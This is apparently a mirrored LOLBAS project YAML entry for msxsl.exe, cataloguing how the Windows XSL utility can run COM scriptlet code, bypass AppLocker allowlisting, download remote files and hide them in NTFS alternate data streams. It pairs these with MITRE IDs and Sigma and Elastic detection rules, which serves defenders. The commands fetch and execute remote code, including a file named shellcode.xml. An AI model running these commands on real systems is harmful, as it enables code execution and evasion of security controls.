mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
4f83231697
* Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>
65 lines
3.6 KiB
YAML
65 lines
3.6 KiB
YAML
---
|
|
Name: msxsl.exe
|
|
Description: Command line utility used to perform XSL transformations.
|
|
Author: 'Oddvar Moe'
|
|
Created: 2018-05-25
|
|
Commands:
|
|
- Command: msxsl.exe customers.xml script.xsl
|
|
Description: Run COM Scriptlet code within the script.xsl file (local).
|
|
Usecase: Local execution of script stored in XSL file.
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1220
|
|
OperatingSystem: Windows
|
|
- Command: msxsl.exe customers.xml script.xsl
|
|
Description: Run COM Scriptlet code within the script.xsl file (local).
|
|
Usecase: Local execution of script stored in XSL file.
|
|
Category: AWL Bypass
|
|
Privileges: User
|
|
MitreID: T1220
|
|
OperatingSystem: Windows
|
|
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
|
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
|
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1220
|
|
OperatingSystem: Windows
|
|
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
|
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
|
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
|
Category: AWL Bypass
|
|
Privileges: User
|
|
MitreID: T1220
|
|
OperatingSystem: Windows
|
|
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>
|
|
Description: Using remote XML and XSL files, save the transformed XML file to disk.
|
|
Usecase: Download a file from the internet and save it to disk.
|
|
Category: Download
|
|
Privileges: User
|
|
MitreID: T1105
|
|
OperatingSystem: Windows
|
|
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>:ads-name
|
|
Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
|
|
Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream.
|
|
Category: ADS
|
|
Privileges: User
|
|
MitreID: T1564
|
|
OperatingSystem: Windows
|
|
Full_Path:
|
|
- Path: no default
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
|
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml
|
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml
|
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
|
Resources:
|
|
- Link: https://twitter.com/subTee/status/877616321747271680
|
|
- Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
|
|
- Link: https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file
|
|
Acknowledgement:
|
|
- Person: Casey Smith
|
|
Handle: '@subtee'
|
|
- Person: Ronnie Salomonsen
|
|
Handle: '@r0ns3n'
|